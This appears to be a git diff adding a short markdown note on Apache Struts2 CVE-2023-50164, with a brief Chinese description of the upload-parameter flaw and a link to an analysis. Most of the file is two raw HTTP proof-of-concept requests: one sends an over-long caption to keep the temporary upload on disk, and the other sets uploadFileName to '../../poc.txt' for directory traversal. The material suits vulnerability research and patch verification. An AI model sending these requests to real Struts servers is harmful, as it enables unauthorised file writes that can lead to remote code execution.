diff --git a/Apache Struts2 CVE-2023-50164.md b/Apache Struts2 CVE-2023-50164.md
new file mode 100644
index 0000000..e918cfb
--- /dev/null
+++ b/Apache Struts2 CVE-2023-50164.md	
@@ -0,0 +1,57 @@
+## Apache Struts2 CVE-2023-50164
+
+漏洞描述里提到可通过伪造文件上传的参数导致目录穿越，看版本比对，有两个 Commit 引起我的关注，一个是 Always delete uploaded file，另一个是 Makes HttpParameters case-insensitive。前者的作用是确保上传的临时文件被正确上传，在修复之前，通过构造超长的文件上传参数可以让临时文件继续留存在磁盘中；
+
+## 漏洞复现分析
+- https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
+## poc
+```
+POST /s2_066_war_exploded/upload.action HTTP/1.1
+Host: localhost:8080
+Accept-Language: en-US,en;q=0.9
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Length: 593
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Disposition: form-data; name="upload"; filename="poc.txt"
+Content-Type: text/plain
+ 
+test
+ 
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Disposition: form-data; name="caption";
+ 
+ 
+{{randstr(4097,4097)}}
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip--
+```
+
+
+```
+POST /s2_066_war_exploded/upload.action HTTP/1.1
+Host: localhost:8080
+Accept-Language: en-US,en;q=0.9
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Length: 593
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Disposition: form-data; name="upload"; filename="poc.txt"
+Content-Type: text/plain
+ 
+test
+ 
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip
+Content-Disposition: form-data; name="uploadFileName";
+ 
+../../poc.txt
+ 
+------WebKitFormBoundary5WJ61X4PRwyYKlip--
+
+```